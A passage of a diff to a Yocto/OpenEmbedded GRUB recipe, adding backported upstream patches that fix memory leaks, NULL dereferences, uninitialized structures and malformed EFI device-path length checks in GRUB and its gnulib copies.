+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/net/tftp.c b/grub-core/net/tftp.c
+index 7d90bf6..f76b19f 100644
+--- a/grub-core/net/tftp.c
++++ b/grub-core/net/tftp.c
+@@ -468,6 +468,7 @@ tftp_close (struct grub_file *file)
+ }
+ destroy_pq (data);
+ grub_free (data);
++ file->data = NULL;
+ return GRUB_ERR_NONE;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
new file mode 100644
index 0000000000..933416605c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0004-kern-parser-Fix-resource-leak-if-argc-0.patch
@@ -0,0 +1,50 @@
+From 8861fa6226f7229105722ba669465e879b56ee2b Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 22 Jan 2021 12:32:41 +0000
+Subject: [PATCH] kern/parser: Fix resource leak if argc == 0
+
+After processing the command-line yet arriving at the point where we are
+setting argv, we are allocating memory, even if argc == 0, which makes
+no sense since we never put anything into the allocated argv.
+
+The solution is to simply return that we've successfully processed the
+arguments but that argc == 0, and also ensure that argv is NULL when
+we're not allocating anything in it.
+
+There are only 2 callers of this function, and both are handling a zero
+value in argc assuming nothing is allocated in argv.
+
+Fixes: CID 96680
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d06161b035dde4769199ad65aa0a587a5920012b]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/parser.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
+index 619db31..d1cf061 100644
+--- a/grub-core/kern/parser.c
++++ b/grub-core/kern/parser.c
+@@ -146,6 +146,7 @@ grub_parser_split_cmdline (const char *cmdline,
+ int i;
+
+ *argc = 0;
++ *argv = NULL;
+ do
+ {
+ if (!rd || !*rd)
+@@ -207,6 +208,10 @@ grub_parser_split_cmdline (const char *cmdline,
+ (*argc)++;
+ }
+
++ /* If there are no args, then we're done. */
++ if (!*argc)
++ return 0;
++
+ /* Reserve memory for the return values. */
+ args = grub_malloc (bp - buffer);
+ if (!args)
diff --git a/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
new file mode 100644
index 0000000000..04748befc8
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0005-efi-Fix-some-malformed-device-path-arithmetic-errors.patch
@@ -0,0 +1,235 @@
+From 16a4d739b19f8680cf93a3c8fa0ae9fc1b1c310b Mon Sep 17 00:00:00 2001
+From: Peter Jones <pjones@redhat.com>
+Date: Sun, 19 Jul 2020 16:53:27 -0400
+Subject: [PATCH] efi: Fix some malformed device path arithmetic errors
+
+Several places we take the length of a device path and subtract 4 from
+it, without ever checking that it's >= 4. There are also cases where
+this kind of malformation will result in unpredictable iteration,
+including treating the length from one dp node as the type in the next
+node. These are all errors, no matter where the data comes from.
+
+This patch adds a checking macro, GRUB_EFI_DEVICE_PATH_VALID(), which
+can be used in several places, and makes GRUB_EFI_NEXT_DEVICE_PATH()
+return NULL and GRUB_EFI_END_ENTIRE_DEVICE_PATH() evaluate as true when
+the length is too small. Additionally, it makes several places in the
+code check for and return errors in these cases.
+
+Signed-off-by: Peter Jones <pjones@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d2cf823d0e31818d1b7a223daff6d5e006596543]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/efi.c | 64 +++++++++++++++++++++++++-----
+ grub-core/loader/efi/chainloader.c | 13 +++++-
+ grub-core/loader/i386/xnu.c | 9 +++--
+ include/grub/efi/api.h | 14 ++++---
+ 4 files changed, 79 insertions(+), 21 deletions(-)
+
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index ad170c7..6a38080 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -360,7 +360,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+
+ dp = dp0;
+
+- while (1)
++ while (dp)
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -370,9 +370,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ if (type == GRUB_EFI_MEDIA_DEVICE_PATH_TYPE
+ && subtype == GRUB_EFI_FILE_PATH_DEVICE_PATH_SUBTYPE)
+ {
+- grub_efi_uint16_t len;
+- len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
+- / sizeof (grub_efi_char16_t));
++ grub_efi_uint16_t len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++ len = (len - 4) / sizeof (grub_efi_char16_t);
+ filesize += GRUB_MAX_UTF8_PER_UTF16 * len + 2;
+ }
+
+@@ -388,7 +394,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ if (!name)
+ return NULL;
+
+- while (1)
++ while (dp)
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -404,8 +410,15 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+
+ *p++ = '/';
+
+- len = ((GRUB_EFI_DEVICE_PATH_LENGTH (dp) - 4)
+- / sizeof (grub_efi_char16_t));
++ len = GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ len = (len - 4) / sizeof (grub_efi_char16_t);
+ fp = (grub_efi_file_path_device_path_t *) dp;
+ /* According to EFI spec Path Name is NULL terminated */
+ while (len > 0 && fp->path_name[len - 1] == 0)
+@@ -480,7 +493,26 @@ grub_efi_duplicate_device_path (const grub_efi_device_path_t *dp)
+ ;
+ p = GRUB_EFI_NEXT_DEVICE_PATH (p))
+ {
+- total_size += GRUB_EFI_DEVICE_PATH_LENGTH (p);
++ grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (p);
++
++ /*
++ * In the event that we find a node that's completely garbage, for
++ * example if we get to 0x7f 0x01 0x02 0x00 ... (EndInstance with a size
++ * of 2), GRUB_EFI_END_ENTIRE_DEVICE_PATH() will be true and
++ * GRUB_EFI_NEXT_DEVICE_PATH() will return NULL, so we won't continue,
++ * and neither should our consumers, but there won't be any error raised
++ * even though the device path is junk.
++ *
++ * This keeps us from passing junk down back to our caller.
++ */
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ total_size += len;
+ if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (p))
+ break;
+ }
+@@ -525,7 +557,7 @@ dump_vendor_path (const char *type, grub_efi_vendor_device_path_t *vendor)
+ void
+ grub_efi_print_device_path (grub_efi_device_path_t *dp)
+ {
+- while (1)
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp))
+ {
+ grub_efi_uint8_t type = GRUB_EFI_DEVICE_PATH_TYPE (dp);
+ grub_efi_uint8_t subtype = GRUB_EFI_DEVICE_PATH_SUBTYPE (dp);
+@@ -937,7 +969,10 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
+ /* Return non-zero. */
+ return 1;
+
+- while (1)
++ if (dp1 == dp2)
++ return 0;
++
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
+ {
+ grub_efi_uint8_t type1, type2;
+ grub_efi_uint8_t subtype1, subtype2;
+@@ -973,5 +1008,14 @@ grub_efi_compare_device_paths (const grub_efi_device_path_t *dp1,
+ dp2 = (grub_efi_device_path_t *) ((char *) dp2 + len2);
+ }
+
++ /*
++ * There's no "right" answer here, but we probably don't want to call a valid
++ * dp and an invalid dp equal, so pick one way or the other.
++ */
++ if (GRUB_EFI_DEVICE_PATH_VALID (dp1) && !GRUB_EFI_DEVICE_PATH_VALID (dp2))
++ return 1;
++ else if (!GRUB_EFI_DEVICE_PATH_VALID (dp1) && GRUB_EFI_DEVICE_PATH_VALID (dp2))
++ return -1;
++
+ return 0;
+ }
+diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
+index daf8c6b..a8d7b91 100644
+--- a/grub-core/loader/efi/chainloader.c
++++ b/grub-core/loader/efi/chainloader.c
+@@ -156,9 +156,18 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
+
+ size = 0;
+ d = dp;
+- while (1)
++ while (d)
+ {
+- size += GRUB_EFI_DEVICE_PATH_LENGTH (d);
++ grub_size_t len = GRUB_EFI_DEVICE_PATH_LENGTH (d);
++
++ if (len < 4)
++ {
++ grub_error (GRUB_ERR_OUT_OF_RANGE,
++ "malformed EFI Device Path node has length=%d", len);
++ return NULL;
++ }
++
++ size += len;
+ if ((GRUB_EFI_END_ENTIRE_DEVICE_PATH (d)))
+ break;
+ d = GRUB_EFI_NEXT_DEVICE_PATH (d);
+diff --git a/grub-core/loader/i386/xnu.c b/grub-core/loader/i386/xnu.c
+index b7d176b..c50cb54 100644
+--- a/grub-core/loader/i386/xnu.c
++++ b/grub-core/loader/i386/xnu.c
+@@ -516,14 +516,15 @@ grub_cmd_devprop_load (grub_command_t cmd __attribute__ ((unused)),
+
+ devhead = buf;
+ buf = devhead + 1;
+- dpstart = buf;
++ dp = dpstart = buf;
+
+- do
++ while (GRUB_EFI_DEVICE_PATH_VALID (dp) && buf < bufend)
+ {
+- dp = buf;
+ buf = (char *) buf + GRUB_EFI_DEVICE_PATH_LENGTH (dp);
++ if (GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp))
++ break;
++ dp = buf;
+ }
+- while (!GRUB_EFI_END_ENTIRE_DEVICE_PATH (dp) && buf < bufend);
+
+ dev = grub_xnu_devprop_add_device (dpstart, (char *) buf
+ - (char *) dpstart);
+diff --git a/include/grub/efi/api.h b/include/grub/efi/api.h
+index addcbfa..cf1355a 100644
+--- a/include/grub/efi/api.h
++++ b/include/grub/efi/api.h
+@@ -625,6 +625,7 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
+ #define GRUB_EFI_DEVICE_PATH_TYPE(dp) ((dp)->type & 0x7f)
+ #define GRUB_EFI_DEVICE_PATH_SUBTYPE(dp) ((dp)->subtype)
+ #define GRUB_EFI_DEVICE_PATH_LENGTH(dp) ((dp)->length)
++#define GRUB_EFI_DEVICE_PATH_VALID(dp) ((dp) != NULL && GRUB_EFI_DEVICE_PATH_LENGTH (dp) >= 4)
+
+ /* The End of Device Path nodes. */
+ #define GRUB_EFI_END_DEVICE_PATH_TYPE (0xff & 0x7f)
+@@ -633,13 +634,16 @@ typedef struct grub_efi_device_path grub_efi_device_path_protocol_t;
+ #define GRUB_EFI_END_THIS_DEVICE_PATH_SUBTYPE 0x01
+
+ #define GRUB_EFI_END_ENTIRE_DEVICE_PATH(dp) \
+- (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
+- && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
+- == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE))
++ (!GRUB_EFI_DEVICE_PATH_VALID (dp) || \
++ (GRUB_EFI_DEVICE_PATH_TYPE (dp) == GRUB_EFI_END_DEVICE_PATH_TYPE \
++ && (GRUB_EFI_DEVICE_PATH_SUBTYPE (dp) \
++ == GRUB_EFI_END_ENTIRE_DEVICE_PATH_SUBTYPE)))
+
+ #define GRUB_EFI_NEXT_DEVICE_PATH(dp) \
+- ((grub_efi_device_path_t *) ((char *) (dp) \
+- + GRUB_EFI_DEVICE_PATH_LENGTH (dp)))
++ (GRUB_EFI_DEVICE_PATH_VALID (dp) \
++ ? ((grub_efi_device_path_t *) \
++ ((char *) (dp) + GRUB_EFI_DEVICE_PATH_LENGTH (dp))) \
++ : NULL)
+
+ /* Hardware Device Path. */
+ #define GRUB_EFI_HARDWARE_DEVICE_PATH_TYPE 1
diff --git a/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
new file mode 100644
index 0000000000..9d7327cee6
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0006-kern-efi-Fix-memory-leak-on-failure.patch
@@ -0,0 +1,30 @@
+From d4fd0243920b71cc6e03cc0cadf23b4fe03c352f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:15:25 +0000
+Subject: [PATCH] kern/efi: Fix memory leak on failure
+
+Free the memory allocated to name before returning on failure.
+
+Fixes: CID 296222
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=ed286ceba6015d37a9304f04602451c47bf195d7]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/efi.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/kern/efi/efi.c b/grub-core/kern/efi/efi.c
+index 6a38080..baeeef0 100644
+--- a/grub-core/kern/efi/efi.c
++++ b/grub-core/kern/efi/efi.c
+@@ -415,6 +415,7 @@ grub_efi_get_filename (grub_efi_device_path_t *dp0)
+ {
+ grub_error (GRUB_ERR_OUT_OF_RANGE,
+ "malformed EFI Device Path node has length=%d", len);
++ grub_free (name);
+ return NULL;
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
new file mode 100644
index 0000000000..d55709406b
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0007-kern-efi-mm-Fix-possible-NULL-pointer-dereference.patch
@@ -0,0 +1,65 @@
+From be03a18b8767be50f16a845c389fd5ed29aae055 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 11 Dec 2020 15:03:13 +0000
+Subject: [PATCH] kern/efi/mm: Fix possible NULL pointer dereference
+
+The model of grub_efi_get_memory_map() is that if memory_map is NULL,
+then the purpose is to discover how much memory should be allocated to
+it for the subsequent call.
+
+The problem here is that with grub_efi_is_finished set to 1, there is no
+check at all that the function is being called with a non-NULL memory_map.
+
+While this MAY be true, we shouldn't assume it.
+
+The solution to this is to behave as expected, and if memory_map is NULL,
+then don't try to use it and allow memory_map_size to be filled in, and
+return 0 as is done later in the code if the buffer is too small (or NULL).
+
+Additionally, drop unneeded ret = 1.
+
+Fixes: CID 96632
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6aee4bfd6973c714056fb7b56890b8d524e94ee1]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/efi/mm.c | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+
+diff --git a/grub-core/kern/efi/mm.c b/grub-core/kern/efi/mm.c
+index b02fab1..5afcef7 100644
+--- a/grub-core/kern/efi/mm.c
++++ b/grub-core/kern/efi/mm.c
+@@ -328,15 +328,24 @@ grub_efi_get_memory_map (grub_efi_uintn_t *memory_map_size,
+ if (grub_efi_is_finished)
+ {
+ int ret = 1;
+- if (*memory_map_size < finish_mmap_size)
++
++ if (memory_map != NULL)
+ {
+- grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
+- ret = 0;
++ if (*memory_map_size < finish_mmap_size)
++ {
++ grub_memcpy (memory_map, finish_mmap_buf, *memory_map_size);
++ ret = 0;
++ }
++ else
++ grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
+ }
+ else
+ {
+- grub_memcpy (memory_map, finish_mmap_buf, finish_mmap_size);
+- ret = 1;
++ /*
++ * Incomplete, no buffer to copy into, same as
++ * GRUB_EFI_BUFFER_TOO_SMALL below.
++ */
++ ret = 0;
+ }
+ *memory_map_size = finish_mmap_size;
+ if (map_key)
diff --git a/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
new file mode 100644
index 0000000000..74ffb559e9
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0008-gnulib-regexec-Resolve-unused-variable.patch
@@ -0,0 +1,59 @@
+From 9d36bce5d516b6379ba3a0dd1a94a9c035838827 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 21 Oct 2020 14:41:27 +0000
+Subject: [PATCH] gnulib/regexec: Resolve unused variable
+
+This is a really minor issue where a variable is being assigned to but
+not checked before it is overwritten again.
+
+The reason for this issue is that we are not building with DEBUG set and
+this in turn means that the assert() that reads the value of the
+variable match_last is being processed out.
+
+The solution, move the assignment to match_last in to an ifdef DEBUG too.
+
+Fixes: CID 292459
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a983d36bd9178d377d2072fd4b11c635fdc404b4]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-unused-value.patch | 14 ++++++++++++++
+ 2 files changed, 15 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-unused-value.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 46c4e95..9b01152 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
+
+diff --git a/grub-core/lib/gnulib-patches/fix-unused-value.patch b/grub-core/lib/gnulib-patches/fix-unused-value.patch
+new file mode 100644
+index 0000000..ba51f1b
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-unused-value.patch
+@@ -0,0 +1,14 @@
++--- a/lib/regexec.c 2020-10-21 14:25:35.310195912 +0000
+++++ b/lib/regexec.c 2020-10-21 14:32:07.961765604 +0000
++@@ -828,7 +828,11 @@
++ break;
++ if (__glibc_unlikely (err != REG_NOMATCH))
++ goto free_return;
+++#ifdef DEBUG
+++ /* Only used for assertion below when DEBUG is set, otherwise
+++ it will be over-written when we loop around. */
++ match_last = -1;
+++#endif
++ }
++ else
++ break; /* We found a match. */
diff --git a/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
new file mode 100644
index 0000000000..b6e3c7edbe
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
@@ -0,0 +1,53 @@
+From 2af8df02cca7fd4b584575eac304cd03fa23f5cc Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 22 Oct 2020 13:54:06 +0000
+Subject: [PATCH] gnulib/regcomp: Fix uninitialized token structure
+
+The code is assuming that the value of br_token.constraint was
+initialized to zero when it wasn't.
+
+While some compilers will ensure that, not all do, so it is better to
+fix this explicitly than leave it to chance.
+
+Fixes: CID 73749
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=75c3d3cec4f408848f575d6d5e30a95bd6313db0]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-uninit-structure.patch | 11 +++++++++++
+ 2 files changed, 12 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 9b01152..9e55458 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-uninit-structure.patch b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+new file mode 100644
+index 0000000..7b4d9f6
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+@@ -0,0 +1,11 @@
++--- a/lib/regcomp.c 2020-10-22 13:49:06.770168928 +0000
+++++ b/lib/regcomp.c 2020-10-22 13:50:37.026528298 +0000
++@@ -3662,7 +3662,7 @@
++ Idx alloc = 0;
++ #endif /* not RE_ENABLE_I18N */
++ reg_errcode_t ret;
++- re_token_t br_token;
+++ re_token_t br_token = {0};
++ bin_tree_t *tree;
++
++ sbcset = (re_bitset_ptr_t) calloc (sizeof (bitset_t), 1);
diff --git a/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
new file mode 100644
index 0000000000..102a494561
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
@@ -0,0 +1,52 @@
+From eaf9da8b5f8349c51cfc89dd8e39a1a61f89790a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 28 Oct 2020 14:43:01 +0000
+Subject: [PATCH] gnulib/argp-help: Fix dereference of a possibly NULL state
+
+All other instances of call to __argp_failure() where there is
+a dgettext() call is first checking whether state is NULL before
+attempting to dereference it to get the root_argp->argp_domain.
+
+Fixes: CID 292436
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3a37bf120a9194c373257c70175cdb5b337bc107]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-null-state-deref.patch | 12 ++++++++++++
+ 2 files changed, 13 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 9e55458..96d7e69 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-null-state-deref.patch b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+new file mode 100644
+index 0000000..813ec09
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+@@ -0,0 +1,12 @@
++--- a/lib/argp-help.c 2020-10-28 14:32:19.189215988 +0000
+++++ b/lib/argp-help.c 2020-10-28 14:38:21.204673940 +0000
++@@ -145,7 +145,8 @@
++ if (*(int *)((char *)upptr + up->uparams_offs) >= upptr->rmargin)
++ {
++ __argp_failure (state, 0, 0,
++- dgettext (state->root_argp->argp_domain,
+++ dgettext (state == NULL ? NULL
+++ : state->root_argp->argp_domain,
++ "\
++ ARGP_HELP_FMT: %s value is less than or equal to %s"),
++ "rmargin", up->name);
diff --git a/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
new file mode 100644
index 0000000000..4f43fcf7d5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
@@ -0,0 +1,53 @@
+From 244dc2b1f518635069a556c424b2e7627f0cf036 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:57:14 +0000
+Subject: [PATCH] gnulib/regexec: Fix possible null-dereference
+
+It appears to be possible that the mctx->state_log field may be NULL,
+and the name of this function, clean_state_log_if_needed(), suggests
+that it should be checking that it is valid to be cleaned before
+assuming that it does.
+
+Fixes: CID 86720
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0b7f347638153e403ee2dd518af3ce26f4f99647]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-regexec-null-deref.patch | 12 ++++++++++++
+ 2 files changed, 13 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 96d7e69..d27d3a9 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+new file mode 100644
+index 0000000..db6dac9
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+@@ -0,0 +1,12 @@
++--- a/lib/regexec.c 2020-10-21 14:25:35.310195912 +0000
+++++ b/lib/regexec.c 2020-11-05 10:55:09.621542984 +0000
++@@ -1692,6 +1692,9 @@
++ {
++ Idx top = mctx->state_log_top;
++
+++ if (mctx->state_log == NULL)
+++ return REG_NOERROR;
+++
++ if ((next_state_log_idx >= mctx->input.bufs_len
++ && mctx->input.bufs_len < mctx->input.len)
++ || (next_state_log_idx >= mctx->input.valid_len
diff --git a/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
new file mode 100644
index 0000000000..0507e0cd66
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
@@ -0,0 +1,55 @@
+From 512b6bb380a77233b88c84b7a712896c70281d2f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 24 Nov 2020 18:04:22 +0000
+Subject: [PATCH] gnulib/regcomp: Fix uninitialized re_token
+
+This issue has been fixed in the latest version of gnulib, so to
+maintain consistency, I've backported that change rather than doing
+something different.
+
+Fixes: CID 73828
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
